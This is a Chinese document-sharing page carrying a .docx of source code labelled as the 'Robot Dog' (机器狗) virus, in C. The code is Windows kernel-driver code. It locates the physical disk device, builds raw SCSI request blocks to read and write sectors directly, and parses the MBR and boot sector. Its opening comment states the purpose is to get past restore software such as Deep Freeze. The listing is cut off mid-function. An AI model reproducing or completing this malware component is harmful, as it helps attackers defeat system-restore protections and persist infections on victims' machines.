机器狗病毒源码1C语言.docx
- 文档编号:4276755
- 上传时间:2022-11-28
- 格式:DOCX
- 页数:17
- 大小:19.88KB
机器狗病毒源码1C语言.docx
《机器狗病毒源码1C语言.docx》由会员分享,可在线阅读,更多相关《机器狗病毒源码1C语言.docx(17页珍藏版)》请在冰豆网上搜索。
机器狗病毒源码1C语言
//备注:
获取文件在扇区的位置后,向磁盘驱动发送srb命令读写扇区,来穿透冰点等还原软件。
//编译时注意:
FileSystemControl的数据结构需要自己添加。
#include
#include
#defineFSCTL_GET_RETRIEVAL_POINTERS0x90073
#definePARTITION_TYPE_NTFS0x07
#definePARTITION_TYPE_FAT320x0B
#definePARTITION_TYPE_FAT32_LBA0x0C
externPOBJECT_TYPE*IoDriverObjectType;
LARGE_INTEGERrealdiskpos;
ULONGsectorspercluster;
typedefstructRETRIEVAL_POINTERS_BUFFER{
ULONGExtentCount;
LARGE_INTEGERStartingVcn;
struct{
LARGE_INTEGERNextVcn;
LARGE_INTEGERLcn;
}Extents[1];
}RETRIEVAL_POINTERS_BUFFER,*PRETRIEVAL_POINTERS_BUFFER;
typedefstruct{LARGE_INTEGERStartingVcn;
}STARTING_VCN_INPUT_BUFFER,*PSTARTING_VCN_INPUT_BUFFER;
typedefstruct_SENSE_DATA{
unsignedcharValid;
unsignedcharSegmentNumber;
unsignedcharFileMark;
unsignedcharInformation[4];
unsignedcharAdditionalSenseLength;
unsignedcharCommandSpecificInformation[4];
unsignedcharAdditionalSenseCode;
unsignedcharAdditionalSenseCodeQualifier;
unsignedcharFieldReplaceableUnitCode;
unsignedcharSenseKeySpecific[3];
}SENSE_DATA,*PSENSE_DATA;
#pragmapack
(1)
typedefstruct_PARTITION_ENTRY
{
UCHARactive;
UCHARStartHead;
UCHARStartSector;
UCHARStartCylinder;
UCHARPartitionType;
UCHAREndHead;
UCHAREndSector;
UCHAREndCylinder;
ULONGStartLBA;
ULONGTotalSector;
}PARTITION_ENTRY,*PPARTITION_ENTRY;
typedefstruct_MBR_SECTOR
{
UCHARBootCode[446];
PARTITION_ENTRYPartition[4];
USHORTSignature;
}MBR_SECTOR,*PMBR_SECTOR;
typedefstruct_BBR_SECTOR
{
USHORTJmpCode;
UCHARNopCode;
UCHAROEMName[8];
USHORTBytesPerSector;
UCHARSectorsPerCluster;
USHORTReservedSectors;
UCHARNumberOfFATs;
USHORTRootEntries;
USHORTNumberOfSectors16;
UCHARMediaDescriptor;
USHORTSectorsPerFAT16;
USHORTSectorsPerTrack;
USHORTHeadsPerCylinder;
ULONGHiddenSectors;
ULONGNumberOfSectors32;
ULONGSectorsPerFAT32;
}BBR_SECTOR,*PBBR_SECTOR;
#pragmapack()
typedefstruct_SYSTEM_MODULE_INFORMATION{
ULONGReserved[2];
PVOIDBase;
ULONGSize;
ULONGFlags;
USHORTIndex;
USHORTUnknown;
USHORTLoadCount;
USHORTModuleNameOffset;
CHARImageName[255];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
ObReferenceObjectByName(
INPUNICODE_STRINGObjectName,
INULONGAttributes,
INPACCESS_STATEAccessStateOPTIONAL,
INACCESS_MASKDesiredAccessOPTIONAL,
INPOBJECT_TYPEObjectType,
INKPROCESSOR_MODEAccessMode,
INOUTPVOIDParseContextOPTIONAL,
OUTPVOID*Object);
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
INULONGSystemInformationClass,
INOUTPVOIDSystemInformation,
INULONGSystemInformationLength,
OUTPULONGReturnLength);
NTSTATUS
IrpCompletionRoutine(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(!
Context)
{
mdl=Irp->MdlAddress;
if(mdl){
DbgPrint("readsize:
%d..",Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}}
KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
NTSTATUSIrpCompletionRoutine_0(
INPDEVICE_OBJECTDeviceObject,
INPIRPIrp,
INPVOIDContext
){
PMDLmdl;
Irp->UserIosb->Status=Irp->IoStatus.Status;
Irp->UserIosb->Information=Irp->IoStatus.Information;
if(!
Context)
{
mdl=Irp->MdlAddress;
if(mdl)
{
DbgPrint("readsize:
%d..",Irp->IoStatus.Information);
MmUnlockPages(mdl);
IoFreeMdl(mdl);
}
}
KeSetEvent(Irp->UserEvent,IO_NO_INCREMENT,0);
IoFreeIrp(Irp);
returnSTATUS_MORE_PROCESSING_REQUIRED;
}
ULONGGetModuleBase(char*name){
ULONGn,i;
PSYSTEM_MODULE_INFORMATIONmodule;
PVOIDpbuftmp;
charmodulename[255];
ZwQuerySystemInformation(11,&n,0,&n);
pbuftmp=ExAllocatePool(NonPagedPool,n);
ZwQuerySystemInformation(11,pbuftmp,n,NULL);
module=(PSYSTEM_MODULE_INFORMATION)((PULONG)pbuftmp+1);
n=*((PULONG)pbuftmp);
for(i=0;i { strcpy(modulename,module.ImageName+module.ModuleNameOffset); if(! _strnicmp(modulename,name,strlen(name))){ ExFreePool(pbuftmp); return(ULONG)module.Base; } } ExFreePool(pbuftmp); return0; } NTSTATUSMyIoCallDriver(PDEVICE_OBJECTDeviceObject,PIRPIrp)//自己的IoCallDriver { PIO_STACK_LOCATIONstack; --Irp->CurrentLocation; stack=IoGetNextIrpStackLocation(Irp); Irp->Tail.Overlay.CurrentStackLocation=stack;//移动堆栈 stack->DeviceObject=DeviceObject; return(DeviceObject->DriverObject->MajorFunction[(ULONG)stack->MajorFunction])(DeviceObject,Irp); } ULONGAtapiReadWriteDisk(PDEVICE_OBJECTdev_object,ULONGMajorFunction,PVOIDbuffer,ULONGDiskPos,intBlockCount) { NTSTATUSstatus; PSCSI_REQUEST_BLOCKsrb; PSENSE_DATAsense; KEVENTEvent; PIRPirp; PMDLmdl; IO_STATUS_BLOCKisb; PIO_STACK_LOCATIONisl; PVOIDpsense; intcount=8; while (1){ srb=ExAllocatePool(0,sizeof(SCSI_REQUEST_BLOCK)); if(! srb) break; sense=ExAllocatePool(0,sizeof(SENSE_DATA)); psense=sense; if(! sense) break; memset(srb,0,sizeof(SCSI_REQUEST_BLOCK)); memset(sense,0,sizeof(SENSE_DATA)); srb->Length=sizeof(SCSI_REQUEST_BLOCK);//更多关于srb,请看《SCSI总线和IDE接口: 协议、应用和编程》和《SCSI程序员指南》 srb->Function=0; srb->DataBuffer=buffer; srb->DataTransferLength=BlockCount<<9;//sectorsize*numberofsector srb->QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE; srb->SrbStatus=0; srb->ScsiStatus=0; srb->NextSrb=0; srb->SenseInfoBuffer=sense; srb->SenseInfoBufferLength=sizeof(SENSE_DATA); if(MajorFunction==IRP_MJ_READ) srb->SrbFlags=SRB_FLAGS_DATA_IN; else srb->SrbFlags=SRB_FLAGS_DATA_OUT; if(MajorFunction==IRP_MJ_READ) srb->SrbFlags|=SRB_FLAGS_ADAPTER_CACHE_ENABLE; srb->SrbFlags|=SRB_FLAGS_DISABLE_AUTOSENSE; srb->TimeOutValue=(srb->DataTransferLength>>10)+1; srb->QueueSortKey=DiskPos; srb->CdbLength=10; srb->Cdb[0]=2*((UCHAR)MajorFunction+17); srb->Cdb[1]=srb->Cdb[1]&0x1F|0x80; srb->Cdb[2]=(unsignedchar)(DiskPos>>0x18)&0xFF;// srb->Cdb[3]=(unsignedchar)(DiskPos>>0x10)&0xFF;// srb->Cdb[4]=(unsignedchar)(DiskPos>>0x08)&0xFF;// srb->Cdb[5]=(UCHAR)DiskPos;//填写sector位置 srb->Cdb[7]=(UCHAR)BlockCount>>0x08; srb->Cdb[8]=(UCHAR)BlockCount; //By: Eros412 KeInitializeEvent(&Event,0,0); irp=IoAllocateIrp(dev_object->StackSize,0); mdl=IoAllocateMdl(buffer,BlockCount<<9,0,0,irp); irp->MdlAddress=mdl; if(! mdl){ ExFreePool(srb); ExFreePool(psense); IoFreeIrp(irp); returnSTATUS_INSUFFICIENT_RESOURCES; } MmProbeAndLockPages(mdl,0,(MajorFunction==IRP_MJ_READ? 0: 1)); srb->OriginalRequest=irp; irp->UserIosb=&isb; irp->UserEvent=&Event; irp->IoStatus.Status=0; irp->IoStatus.Information=0; irp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE; irp->AssociatedIrp.SystemBuffer=0; irp->Cancel=0; irp->RequestorMode=0; irp->CancelRoutine=0; irp->Tail.Overlay.Thread=PsGetCurrentThread(); isl=IoGetNextIrpStackLocation(irp); isl->DeviceObject=dev_object; isl->MajorFunction=IRP_MJ_SCSI; isl->Parameters.Scsi.Srb=srb; isl->CompletionRoutine=IrpCompletionRoutine_0; isl->Context=srb; isl->Control=SL_INVOKE_ON_CANCEL|SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR; status=MyIoCallDriver(dev_object,irp); KeWaitForSingleObject(&Event,0,0,0,0); if(srb->SenseInfoBuffer! =psense&&srb->SenseInfoBuffer) ExFreePool(srb->SenseInfoBuffer); ExFreePool(srb); ExFreePool(psense); if(status>=0||! count) returnstatus; DbgPrint("SendXXXFailed..%08x\r\n",status); KeStallExecutionProcessor(1u); --count; } returnSTATUS_INSUFFICIENT_RESOURCES; } PDEVICE_OBJECTGetLastDiskDeviceObject(PDRIVER_OBJECTdrv_object)//这个就是DR0 { PDEVICE_OBJECTresult; PDEVICE_OBJECTfinddev; finddev=drv_object->DeviceObject; result=NULL; while(finddev) { if(finddev->DeviceType==FILE_DEVICE_DISK) result=finddev; finddev=finddev->NextDevice; } returnresult; } PDEVICE_OBJECTGetAtaDr0DevObject(){ UNICODE_STRINGdiskstr; PDRIVER_OBJECTdiskdrv; PDEVICE_OBJECTdr0dev; RtlInitUnicodeString(&diskstr,L"\\Driver\\Disk"); if(ObReferenceObjectByName(&diskstr,64,0,0,*IoDriverObjectType,0,0,&diskdrv)<0) returnNULL; dr0dev=GetLastDiskDeviceObject(diskdrv); if(dr0dev) DbgPrint("Eros412said: atadr0devobjis: %08x...",dr0dev); ObfDereferenceObject(diskdrv); returndr0dev; } PDEVICE_OBJECTGetFileObjectDevice(PFILE_OBJECTObject){ PDEVICE_OBJECTresult=NULL; PVPBvpb; vpb=Object->Vpb; result=vpb->DeviceObject; if(! vpb||! result) { if(! Object->DeviceObject->Vpb||! Object->DeviceObject->Vpb->DeviceObject) result=Object->DeviceObject; } returnresult; } PLARGE_INTEGERGetPosAndCluster()//得到第一个分区文件数据的起始位置 { PVOIDbuffer; ULONGtype,startlba; inti; PLARGE_INTEGERresult; PDEVICE_OBJECTdev; PMBR_SECTORmbrsec; PPARTITION_ENTRYpartition0; PBBR_SECTORbootsec; result=ExAllocatePool(0,sizeof(LARGE_INTEGER)); dev=GetAtaDr0DevObject(); if(dev){ buffer=ExAllocatePool(0,512); memset(buffer,0,512); if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,0,1)>0) DbgPrint("AtapiReadWriteDiskok"); mbrsec=(PMBR_SECTOR)buffer; partition0=&mbrsec->Partition[0]; startlba=partition0[0].StartLBA; type=partition0[0].PartitionType; DbgPrint("dwPartOnePos: 0x%08x..1",startlba); result->QuadPart=startlba; memset(buffer,0,512); if(AtapiReadWriteDisk(dev,IRP_MJ_READ,buffer,startlba,1)>0){ bootsec=(PBBR_SECTOR)buffer; DbgPrint("gSectorsPerCluster: %d...",bootsec->SectorsPerCluster); sectorspercluster=bootsec->SectorsPerCluster; } result->QuadPart+=bootsec->ReservedSectors; DbgPrint("dwPartOnePos: %I64x..2\r\n",result->QuadPart); if(type==PARTITION_TYPE_FAT32||type==PARTITION_TYPE_FAT32_LBA) result->QuadPart+=bootsec->NumberOfFATs*bootsec->SectorsPerFA
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 机器 病毒 源码 语言